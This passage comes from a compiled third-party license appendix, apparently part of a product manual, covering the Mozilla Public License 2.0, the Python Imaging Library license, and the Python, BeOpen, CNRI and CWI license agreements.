Software”\nmeans Source Code Form to which the initial Contributor has attached the notice in Exhibit A, the Executable Form of such\nSource Code Form, and Modifications of such Source Code Form, in each case including portions thereof.\n1.5. “Incompatible With Secondary Licenses”\nmeans\nthat the initial Contributor has attached the notice described in Exhibit B to the Covered Software; or\nthat the Covered Software was made available under the terms of version 1.1 or earlier of the License, but not also under the\nterms of a Secondary License.\n1.6. “Executable Form”\nmeans any form of the work other than Source Code Form.\n1.7. “Larger Work”\nmeans a work that combines Covered Software with other material, in a separate file or files, that is not Covered Software.\n1.8. “License”\nmeans this document.\n1.9. “Licensable”\nmeans having the right to grant, to the maximum extent possible, whether at the time of the initial grant or subsequently, any\nand all of the rights conveyed by this License.\n1.10. “Modifications”\nmeans any of the following:\nany file in Source Code Form that results from an addition to, deletion from, or modification of the contents of Covered\nSoftware; or\nany new file in Source Code Form that contains any Covered Software.\n1.11. “Patent Claims” of a Contributor\nmeans any patent claim(s), including without limitation, method, process, and apparatus claims, in any patent Licensable by\nsuch Contributor that would be infringed, but for the grant of the License, by the making, using, selling, offering for sale,\nhaving made, import, or transfer of either its Contributions or its Contributor Version.\n57\n1.12. “Secondary License”\nmeans either the GNU General Public License, Version 2.0, the GNU Lesser General Public License, Version 2.1, the GNU\nAffero General Public License, Version 3.0, or any later versions of those licenses.\n1.13. “Source Code Form”\nmeans the form of the work preferred for making modifications.\n1.14. “You” (or “Your”)\nmeans an individual or a legal entity exercising rights under this License. For legal entities, “You” includes any entity that\ncontrols, is controlled by, or is under common control with You. For purposes of this definition, “control” means (a) the power,\ndirect or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (b) ownership of\nmore than fifty percent (50%) of the outstanding shares or beneficial ownership of such entity.\n2. License Grants and Conditions\n2.1. Grants\nEach Contributor hereby grants You a world-wide, royalty-free, non-exclusive license:\nunder intellectual property rights (other than patent or trademark) Licensable by such Contributor to use, reproduce, make\navailable, modify, display, perform, distribute, and otherwise exploit its Contributions, either on an unmodified basis, with\nModifications, or as part of a Larger Work; and\nunder Patent Claims of such Contributor to make, use, sell, offer for sale, have made, import, and otherwise transfer either\nits Contributions or its Contributor Version.\n2.2. Effective Date\nThe licenses granted in Section 2.1 with respect to any Contribution become effective for each Contribution on the date the\nContributor first distributes such Contribution.\n2.3. Limitations on Grant Scope\nThe licenses granted in this Section 2 are the only rights granted under this License. No additional rights or licenses will be\nimplied from the distribution or licensing of Covered Software under this License. Notwithstanding Section 2.1(b) above, no\npatent license is granted by a Contributor:\nfor any code that a Contributor has removed from Covered Software; or\nfor infringements caused by: (i) Your and any other third party’s modifications of Covered Software, or (ii) the combination of\nits Contributions with other software (except as part of its Contributor Version); or\nunder Patent Claims infringed by Covered Software in the absence of its Contributions.\nThis License does not grant any rights in the trademarks, service marks, or logos of any Contributor (except as may be\nnecessary to comply with the notice requirements in Section 3.4).\n2.4. Subsequent Licenses\nNo Contributor makes additional grants as a result of Your choice to distribute the Covered Software under a subsequent\nversion of this License (see Section 10.2) or under the terms of a Secondary License (if permitted under the terms of Section\n3.3).\n2.5. Representation\nEach Contributor represents that the Contributor believes its Contributions are its original creation(s) or it has sufficient rights\nto grant the rights to its Contributions conveyed by this License.\n2.6. Fair Use\n58\nThis License is not intended to limit any rights You have under applicable copyright doctrines of fair use, fair dealing, or other\nequivalents.\n2.7. Conditions\nSections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted in Section 2.1.\n3. Responsibilities\n3.1. Distribution of Source Form\nAll distribution of Covered Software in Source Code Form, including any Modifications that You create or to which You\ncontribute, must be under the terms of this License. You must inform recipients that the Source Code Form of the Covered\nSoftware is governed by the terms of this License, and how they can obtain a copy of this License. You may not attempt to\nalter or restrict the recipients’ rights in the Source Code Form.\n3.2. Distribution of Executable Form\nIf You distribute Covered Software in Executable Form then:\nsuch Covered Software must also be made available in Source Code Form, as described in Section 3.1, and You must\ninform recipients of the Executable Form how they can obtain a copy of such Source Code Form by reasonable means in a\ntimely manner, at a charge no more than the cost of distribution to the recipient; and\nYou may distribute such Executable Form under the terms of this License, or sublicense it under different terms, provided\nthat the license for the Executable Form does not attempt to limit or alter the recipients’ rights in the Source Code Form\nunder this License.\n3.3. Distribution of a Larger Work\nYou may create and distribute a Larger Work under terms of Your choice, provided that You also comply with the\nrequirements of this License for the Covered Software. If the Larger Work is a combination of Covered Software with a work\ngoverned by one or more Secondary Licenses, and the Covered Software is not Incompatible With Secondary Licenses, this\nLicense permits You to additionally distribute such Covered Software under the terms of such Secondary License(s), so that\nthe recipient of the Larger Work may, at their option, further distribute the Covered Software under the terms of either this\nLicense or such Secondary License(s).\n3.4. Notices\nYou may not remove or alter the substance of any license notices (including copyright notices, patent notices, disclaimers of\nwarranty, or limitations of liability) contained within the Source Code Form of the Covered Software, except that You may\nalter any license notices to the extent required to remedy known factual inaccuracies.\n3.5. Application of Additional Terms\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity or liability obligations to one or more\nrecipients of Covered Software. However, You may do so only on Your own behalf, and not on behalf of any Contributor.\nYou must make it absolutely clear that any such warranty, support, indemnity, or liability obligation is offered by You alone,\nand You hereby agree to indemnify every Contributor for any liability incurred by such Contributor as a result of warranty,\nsupport, indemnity or liability terms You offer. You may include additional disclaimers of warranty and limitations of liability\nspecific to any jurisdiction.\n4. Inability to Comply Due to Statute or Regulation\nIf it is impossible for You to comply with any of the terms of this License with respect to some or all of the Covered Software\ndue to statute, judicial order, or regulation then You must: (a) comply with the terms of this License to the maximum extent\npossible; and (b) describe the limitations and the code they affect. Such description must be placed in a text file included with\nall distributions of the Covered Software under this License. Except to the extent prohibited by statute or regulation, such\ndescription must be sufficiently detailed for a recipient of ordinary skill to be able to understand it.\n5. Termination\n5.1. The rights granted under this License will terminate automatically if You fail to comply with any of its terms. However, if\nYou become compliant, then the rights granted under this License from a particular Contributor are reinstated (a)\n59\nprovisionally, unless and until such Contributor explicitly and finally terminates Your grants, and (b) on an ongoing basis, if\nsuch Contributor fails to notify You of the non-compliance by some reasonable means prior to 60 days after You have come\nback into compliance. Moreover, Your grants from a particular Contributor are reinstated on an ongoing basis if such\nContributor notifies You of the non-compliance by some reasonable means, this is the first time You have received notice of\nnon-compliance with this License from such Contributor, and You become compliant prior to 30 days after Your receipt of the\nnotice.\n5.2. If You initiate litigation against any entity by asserting a patent infringement claim (excluding declaratory judgment\nactions, counter-claims, and cross-claims) alleging that a Contributor Version directly or indirectly infringes any patent, then\nthe rights granted to You by any and all Contributors for the Covered Software under Section 2.1 of this License shall\nterminate.\n5.3. In the event of termination under Sections 5.1 or 5.2 above, all end user license agreements (excluding distributors and\nresellers) which have been validly granted by You or Your distributors under this License prior to termination shall survive\ntermination.\n6. Disclaimer of Warranty\nCovered Software is provided under this License on an “as is” basis, without warranty of any kind, either expressed, implied,\nor statutory, including, without limitation, warranties that the Covered Software is free of defects, merchantable, fit for a\nparticular purpose or non-infringing. The entire risk as to the quality and performance of the Covered Software is with You.\nShould any Covered Software prove defective in any respect, You (not any Contributor) assume the cost of any necessary\nservicing, repair, or correction. This disclaimer of warranty constitutes an essential part of this License. No use of any\nCovered Software is authorized under this License except under this disclaimer.\n7. Limitation of Liability\nUnder no circumstances and under no legal theory, whether tort (including negligence), contract, or otherwise, shall any\nContributor, or anyone who distributes Covered Software as permitted above, be liable to You for any direct, indirect,\nspecial, incidental, or consequential damages of any character including, without limitation, damages for lost profits, loss of\ngoodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses, even if such\nparty shall have been informed of the possibility of such damages. This limitation of liability shall not apply to liability for\ndeath or personal injury resulting from such party’s negligence to the extent applicable law prohibits such limitation. Some\njurisdictions do not allow the exclusion or limitation of incidental or consequential damages, so this exclusion and limitation\nmay not apply to You.\n8. Litigation\nAny litigation relating to this License may be brought only in the courts of a jurisdiction where the defendant maintains its\nprincipal place of business and such litigation shall be governed by laws of that jurisdiction, without reference to its\nconflict-of-law provisions. Nothing in this Section shall prevent a party’s ability to bring cross-claims or counter-claims.\n9. Miscellaneous\nThis License represents the complete agreement concerning the subject matter hereof. If any provision of this License is\nheld to be unenforceable, such provision shall be reformed only to the extent necessary to make it enforceable. Any law or\nregulation which provides that the language of a contract shall be construed against the drafter shall not be used to construe\nthis License against a Contributor.\n10. Versions of the License\n10.1. New Versions\nMozilla Foundation is the license steward. Except as provided in Section 10.3, no one other than the license steward has the\nright to modify or publish new versions of this License. Each version will be given a distinguishing version number.\n10.2. Effect of New Versions\nYou may distribute the Covered Software under the terms of the version of the License under which You originally received\nthe Covered Software, or under the terms of any subsequent version published by the license steward.\n10.3. Modified Versions\nIf you create software not governed by this License, and you want to create a new license for such software, you may create\nand use a modified version of this License if you rename the license and remove any references to the name of the license\n60\nsteward (except to note that such modified license differs from this License).\n10.4. Distributing Source Code Form that is Incompatible With Secondary Licenses\nIf You choose to distribute Source Code Form that is Incompatible With Secondary Licenses under the terms of this version\nof the License, the notice described in Exhibit B of this License must be attached.\nExhibit A - Source Code Form License Notice\nThis Source Code Form is subject to the terms of the Mozilla Public License, v. 2.0. If a copy of the MPL was not distributed\nwith this file, You can obtain one at https://mozilla.org/MPL/2.0/.\nIf it is not possible or desirable to put the notice in a particular file, then You may include the notice in a location (such as a\nLICENSE file in a relevant directory) where a recipient would be likely to look for such a notice.\nYou may add additional accurate notices of copyright ownership.\nExhibit B - “Incompatible With Secondary Licenses” Notice\nThis Source Code Form is “Incompatible With Secondary Licenses”, as defined by the Mozilla Public License, v. 2.0.\n61\nThe Python Imaging Library (PIL) Software License\nCopyright © 1997-2011 by Secret Labs AB\nCopyright © 1995-2011 by Fredrik Lundh\nBy obtaining, using, and/or copying this software and/or its associated documentation, you agree that you have read,\nunderstood, and will comply with the following terms and conditions:\nPermission to use, copy, modify, and distribute this software and its associated documentation for any purpose and without\nfee is hereby granted, provided that the above copyright notice appears in all copies, and that both that copyright notice and\nthis permission notice appear in supporting documentation, and that the name of Secret Labs AB or the author not be used\nin advertising or publicity pertaining to distribution of the software without specific, written prior permission.\nSECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,\nINCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS\nAB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,\nNEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR\nPERFORMANCE OF THIS SOFTWARE.\n62\nPython Software Foundation License Version 2\n1. This LICENSE AGREEMENT is between the Python Software Foundation (\"PSF\"), and the Individual or Organization\n(\"Licensee\") accessing and otherwise using this software (\"Python\") in source or binary form and its associated\ndocumentation.\n2. Subject to the terms and conditions of this License Agreement, PSF hereby grants Licensee a nonexclusive, royalty-free,\nworld-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works, distribute, and\notherwise use Python alone or in any derivative version, provided, however, that PSF's License Agreement and PSF's notice\nof copyright, i.e., \"Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation; All Rights Reserved\" are\nretained in Python alone or in any derivative version prepared by Licensee.\n3. In the event Licensee prepares a derivative work that is based on or incorporates Python or any part thereof, and wants to\nmake the derivative work available to others as provided herein, then Licensee hereby agrees to include in any such work a\nbrief summary of the changes made to Python.\n4. PSF is making Python available to Licensee on an \"AS IS\" basis. PSF MAKES NO REPRESENTATIONS OR\nWARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND\nDISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR\nPURPOSE OR THAT THE USE OF PYTHON WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON FOR ANY INCIDENTAL, SPECIAL,\nOR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING\nPYTHON, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n6. This License Agreement will automatically terminate upon a material breach of its terms and conditions.\n7. Nothing in this License Agreement shall be deemed to create any relationship of agency, partnership, or joint venture\nbetween PSF and Licensee. This License Agreement does not grant permission to use PSF trademarks or trade name in a\ntrademark sense to endorse or promote products or services of Licensee, or any third party.\n8. By copying, installing or otherwise using Python, Licensee agrees to be bound by the terms and conditions of this License\nAgreement.\n63\nPython License 2.0\nPYTHON SOFTWARE FOUNDATION LICENSE VERSION 2\n1. This LICENSE AGREEMENT is between the Python Software Foundation (\"PSF\"), and the Individual or Organization\n(\"Licensee\") accessing and otherwise using this software (\"Python\") in source or binary form and its associated\ndocumentation.\n2. Subject to the terms and conditions of this License Agreement, PSF hereby grants Licensee a nonexclusive, royalty-free,\nworld-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works, distribute, and\notherwise use Python alone or in any derivative version, provided, however, that PSF's License Agreement and PSF's notice\nof copyright, i.e., \"Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation; All Rights Reserved\" are\nretained in Python alone or in any derivative version prepared by Licensee.\n3. In the event Licensee prepares a derivative work that is based on or incorporates Python or any part thereof, and wants to\nmake the derivative work available to others as provided herein, then Licensee hereby agrees to include in any such work a\nbrief summary of the changes made to Python.\n4. PSF is making Python available to Licensee on an \"AS IS\" basis. PSF MAKES NO REPRESENTATIONS OR\nWARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND\nDISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR\nPURPOSE OR THAT THE USE OF PYTHON WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON FOR ANY INCIDENTAL, SPECIAL,\nOR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING\nPYTHON, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n6. This License Agreement will automatically terminate upon a material breach of its terms and conditions.\n7. Nothing in this License Agreement shall be deemed to create any relationship of agency, partnership, or joint venture\nbetween PSF and Licensee. This License Agreement does not grant permission to use PSF trademarks or trade name in a\ntrademark sense to endorse or promote products or services of Licensee, or any third party.\n8. By copying, installing or otherwise using Python, Licensee agrees to be bound by the terms and conditions of this License\nAgreement.\nBEOPEN.COM LICENSE AGREEMENT FOR PYTHON 2.0\nBEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1\n1. This LICENSE AGREEMENT is between BeOpen.com (\"BeOpen\"), having an office at 160 Saratoga Avenue, Santa\nClara, CA 95051, and the Individual or Organization (\"Licensee\") accessing and otherwise using this software in source or\nbinary form and its associated documentation (\"the Software\").\n2. Subject to the terms and conditions of this BeOpen Python License Agreement, BeOpen hereby grants Licensee a\nnon-exclusive, royalty-free, world-wide license to reproduce, analyze, test, perform and/or display publicly, prepare\nderivative works, distribute, and otherwise use the Software alone or in any derivative version, provided, however, that the\nBeOpen Python License is retained in the Software, alone or in any derivative version prepared by Licensee.\n3. BeOpen is making the Software available to Licensee on an \"AS IS\" basis. BEOPEN MAKES NO REPRESENTATIONS\nOR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND\nDISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR\nPURPOSE OR THAT THE USE OF THE SOFTWARE WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n64\n4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE FOR ANY\nINCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF USING, MODIFYING OR\nDISTRIBUTING THE SOFTWARE, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY\nTHEREOF.\n5. This License Agreement will automatically terminate upon a material breach of its terms and conditions.\n6. This License Agreement shall be governed by and interpreted in all respects by the law of the State of California,\nexcluding conflict of law provisions. Nothing in this License Agreement shall be deemed to create any relationship of agency,\npartnership, or joint venture between BeOpen and Licensee. This License Agreement does not grant permission to use\nBeOpen trademarks or trade names in a trademark sense to endorse or promote products or services of Licensee, or any\nthird party. As an exception, the \"BeOpen Python\" logos available at http://www.pythonlabs.com/logos.html may be used\naccording to the permissions granted on that web page.\n7. By copying, installing or otherwise using the software, Licensee agrees to be bound by the terms and conditions of this\nLicense Agreement.\nCNRI OPEN SOURCE LICENSE AGREEMENT (for Python 1.6b1)\nIMPORTANT: PLEASE READ THE FOLLOWING AGREEMENT CAREFULLY.\nBY CLICKING ON \"ACCEPT\" WHERE INDICATED BELOW, OR BY COPYING, INSTALLING OR OTHERWISE USING\nPYTHON 1.6, beta 1 SOFTWARE, YOU ARE DEEMED TO HAVE AGREED TO THE TERMS AND CONDITIONS OF THIS\nLICENSE AGREEMENT.\n1. This LICENSE AGREEMENT is between the Corporation for National Research Initiatives, having an office at 1895\nPreston White Drive, Reston, VA 20191 (\"CNRI\"), and the Individual or Organization (\"Licensee\") accessing and otherwise\nusing Python 1.6, beta 1 software in source or binary form and its associated documentation, as released at the\nwww.python.org Internet site on August 4, 2000 (\"Python 1.6b1\").\n2. Subject to the terms and conditions of this License Agreement, CNRI hereby grants Licensee a non-exclusive,\nroyalty-free, world-wide license to reproduce, analyze, test, perform and/or display publicly, prepare derivative works,\ndistribute, and otherwise use Python 1.6b1 alone or in any derivative version, provided, however, that CNRIs License\nAgreement is retained in Python 1.6b1, alone or in any derivative version prepared by Licensee.\nAlternately, in lieu of CNRIs License Agreement, Licensee may substitute the following text (omitting the quotes): \"Python\n1.6, beta 1, is made available subject to the terms and conditions in CNRIs License Agreement. This Agreement may be\nlocated on the Internet using the following unique, persistent identifier (known as a handle): 1895.22/1011. This Agreement\nmay also be obtained from a proxy server on the Internet using the URL:http://hdl.handle.net/1895.22/1011\".\n3. In the event Licensee prepares a derivative work that is based on or incorporates Python 1.6b1 or any part thereof, and\nwants to make the derivative work available to the public as provided herein, then Licensee hereby agrees to indicate in any\nsuch work the nature of the modifications made to Python 1.6b1.\n4. CNRI is making Python 1.6b1 available to Licensee on an \"AS IS\" basis. CNRI MAKES NO REPRESENTATIONS OR\nWARRANTIES, EXPRESS OR IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND\nDISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR\nPURPOSE OR THAT THE USE OF PYTHON 1.6b1 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS.\n5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE SOFTWARE FOR ANY INCIDENTAL,\nSPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF USING, MODIFYING OR DISTRIBUTING\nPYTHON 1.6b1, OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n6. This License Agreement will automatically terminate upon a material breach of its terms and conditions.\n7. This License Agreement shall be governed by and interpreted in all respects by the law of the State of Virginia, excluding\nconflict of law provisions. Nothing in this License Agreement shall be deemed to create any relationship of agency,\n65\npartnership, or joint venture between CNRI and Licensee. This License Agreement does not grant permission to use CNRI\ntrademarks or trade name in a trademark sense to endorse or promote products or services of Licensee, or any third party.\n8. By clicking on the \"ACCEPT\" button where indicated, or by copying, installing or otherwise using Python 1.6b1, Licensee\nagrees to be bound by the terms and conditions of this License Agreement.\nACCEPT\nCWI LICENSE AGREEMENT FOR PYTHON 0.9.0 THROUGH 1.2\nCopyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam, The Netherlands. All rights reserved.\nPermission to use, copy, modify, and distribute this software and its documentation for any purpose and without fee is\nhereby granted, provided that the above copyright notice appear in all copies and that both that copyright notice and this\npermission notice appear in supporting documentation, and that the name of Stichting Mathematisch Centrum or CWI not be\nused in advertising or publicity pertaining to distribution of the software without specific, written prior permission.\nSTICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,\nINCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO EVENT SHALL STICHTING\nMATHEMATISCH CENTRUM BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY\nDAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF\nCONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE\nOR PERFORMANCE OF THIS SOFTWARE.\n66\nPython License 2.1.1\nPSF LICENSE AGREEMENT\n---------------------\n1. This LICENSE AGREEMENT is between the Python Software Foundation\n(\"PSF\"), and the Individual or Organization (\"Licensee\") accessing and\notherwise using Python 2.1.1 software in source or binary form and its\nassociated documentation.\n2. Subject to the terms and conditions of this License Agreement, PSF\nhereby grants Licensee a nonexclusive, royalty-free, world-wide\nlicense to reproduce, analyze, test, perform and/or display publicly,\nprepare derivative works, distribute, and otherwise use Python 2.1.1\nalone or in any derivative version, provided, however, that PSF's\nLicense Agreement and PSF's notice of copyright, i.e., \"Copyright (c)\n2001 Python Software Foundation; All Rights Reserved\" are retained in\nPython 2.1.1 alone or in any derivative version prepared by Licensee.\n3. In the event Licensee prepares a derivative work that is based on\nor incorporates Python 2.1.1 or any part thereof, and wants to make\nthe derivative work available to others as provided herein, then\nLicensee hereby agrees to include in any such work a brief summary of\nthe changes made to Python 2.1.1.\n4. PSF is making Python 2.1.1 available to Licensee on an \"AS IS\"\nbasis. PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR\nIMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND\nDISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS\nFOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON 2.1.1 WILL NOT\nINFRINGE ANY THIRD PARTY RIGHTS.\n5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON\n2.1.1 FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS\nA RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.1.1,\nOR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n6. This License Agreement will automatically terminate upon a material\nbreach of its terms and conditions.\n7. Nothing in this License Agreement shall be deemed to create any\nrelationship of agency, partnership, or joint venture between PSF and\nLicensee. This License Agreement does not grant permission to use PSF\ntrademarks or trade name in a trademark sense to endorse or promote\nproducts or services of Licensee, or any third party.\n8. By copying, installing or otherwise using Python 2.1.1, Licensee\nagrees to be bound by the terms and conditions of this License\nAgreement.\nBEOPEN.COM TERMS AND CONDITIONS FOR PYTHON 2.0\n----------------------------------------------\n67\nBEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1\n1. This LICENSE AGREEMENT is between BeOpen.com (\"BeOpen\"), having an\noffice at 160 Saratoga Avenue, Santa Clara, CA 95051, and the\nIndividual or Organization (\"Licensee\") accessing and otherwise using\nthis software in source or binary form and its associated\ndocumentation (\"the Software\").\n2. Subject to the terms and conditions of this BeOpen Python License\nAgreement, BeOpen hereby grants Licensee a non-exclusive,\nroyalty-free, world-wide license to reproduce, analyze, test, perform\nand/or display publicly, prepare derivative works, distribute, and\notherwise use the Software alone or in any derivative version,\nprovided, however, that the BeOpen Python License is retained in the\nSoftware, alone or in any derivative version prepared by Licensee.\n3. BeOpen is making the Software available to Licensee on an \"AS IS\"\nbasis. BEOPEN MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR\nIMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND\nDISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS\nFOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE WILL NOT\nINFRINGE ANY THIRD PARTY RIGHTS.\n4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE\nSOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS\nAS A RESULT OF USING, MODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY\nDERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n5. This License Agreement will automatically terminate upon a material\nbreach of its terms and conditions.\n6. This License Agreement shall be governed by and interpreted in all\nrespects by the law of the State of California, excluding conflict of\nlaw provisions. Nothing in this License Agreement shall be deemed to\ncreate any relationship of agency, partnership, or joint venture\nbetween BeOpen and Licensee. This License Agreement does not grant\npermission to use BeOpen trademarks or trade names in a trademark\nsense to endorse or promote products or services of Licensee, or any\nthird party. As an exception, the \"BeOpen Python\" logos available at\nhttp://www.pythonlabs.com/logos.html may be used according to the\npermissions granted on that web page.\n7. By copying, installing or otherwise using the software, Licensee\nagrees to be bound by the terms and conditions of this License\nAgreement.\nCNRI OPEN SOURCE GPL-COMPATIBLE LICENSE AGREEMENT\n-------------------------------------------------\n1. This LICENSE AGREEMENT is between the Corporation for National\nResearch Initiatives, having an office at 1895 Preston White Drive,\nReston, VA 20191 (\"CNRI\"), and the Individual or Organization\n(\"Licensee\") accessing and otherwise using Python 1.6.1 software in\nsource or binary form and its associated documentation.\n68\n2. Subject to the terms and conditions of this License Agreement, CNRI\nhereby grants Licensee a nonexclusive, royalty-free, world-wide\nlicense to reproduce, analyze, test, perform and/or display publicly,\nprepare derivative works, distribute, and otherwise use Python 1.6.1\nalone or in any derivative version, provided, however, that CNRI's\nLicense Agreement and CNRI's notice of copyright, i.e., \"Copyright (c)\n1995-2001 Corporation for National Research Initiatives; All Rights\nReserved\" are retained in Python 1.6.1 alone or in any derivative\nversion prepared by Licensee. Alternately, in lieu of CNRI's License\nAgreement, Licensee may substitute the following text (omitting the\nquotes): \"Python 1.6.1 is made available subject to the terms and\nconditions in CNRI's License Agreement. This Agreement together with\nPython 1.6.1 may be located on the Internet using the following\nunique, persistent identifier (known as a handle): 1895.22/1013. This\nAgreement may also be obtained from a proxy server on the Internet\nusing the following URL: http://hdl.handle.net/1895.22/1013\".\n3. In the event Licensee prepares a derivative work that is based on\nor incorporates Python 1.6.1 or any part thereof, and wants to make\nthe derivative work available to others as provided herein, then\nLicensee hereby agrees to include in any such work a brief summary of\nthe changes made to Python 1.6.1.\n4. CNRI is making Python 1.6.1 available to Licensee on an \"AS IS\"\nbasis. CNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR\nIMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND\nDISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS\nFOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON 1.6.1 WILL NOT\nINFRINGE ANY THIRD PARTY RIGHTS.\n5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON\n1.6.1 FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS\nA RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 1.6.1,\nOR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.\n6. This License Agreement will automatically terminate upon a material\nbreach of its terms and conditions.\n7. This License Agreement shall be governed by the federal\nintellectual property law of the United States, including without\nlimitation the federal copyright law, and, to the extent such\nU.S. federal law does not apply, by the law of the Commonwealth of\nVirginia, excluding Virginia's conflict of law provisions.\nNotwithstanding the foregoing, with regard to derivative works based\non Python 1.6.1 that incorporate non-separable material that was\npreviously distributed under the GNU General Public License (GPL), the\nlaw of the Commonwealth of Virginia shall govern this License\nAgreement only as to issues arising under or with respect to\nParagraphs 4, 5, and 7 of this License Agreement. Nothing in this\nLicense Agreement shall be deemed to create any relationship of\nagency, partnership, or joint venture between CNRI and Licensee. This\nLicense Agreement does not grant permission to use CNRI trademarks or\ntrade name in a trademark sense to endorse or promote products or\nservices of Licensee, or any third party.\n8. By clicking on the \"ACCEPT\" button where indicated, or by copying,\n69\ninstalling or otherwise using Python 1.6.1, Licensee agrees to be\nbound by the terms and conditions of this License Agreement.\nACCEPT\nCWI PERMISSIONS STATEMENT AND DISCLAIMER\n----------------------------------------\nCopyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam,\nThe Netherlands. All rights reserved.\nPermission to use, copy, modify, and distribute this software and its\ndocumentation for any purpose and without fee is hereby granted,\nprovided that the above copyright notice appear in all copies and that\nboth that copyright notice and this permission notice appear in\nsupporting documentation, and that the name of Stichting Mathematisch\nCentrum or CWI not be used in advertising or publicity pertaining to\ndistribution of the software without specific, written prior\npermission.\nSTICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO\nTHIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY 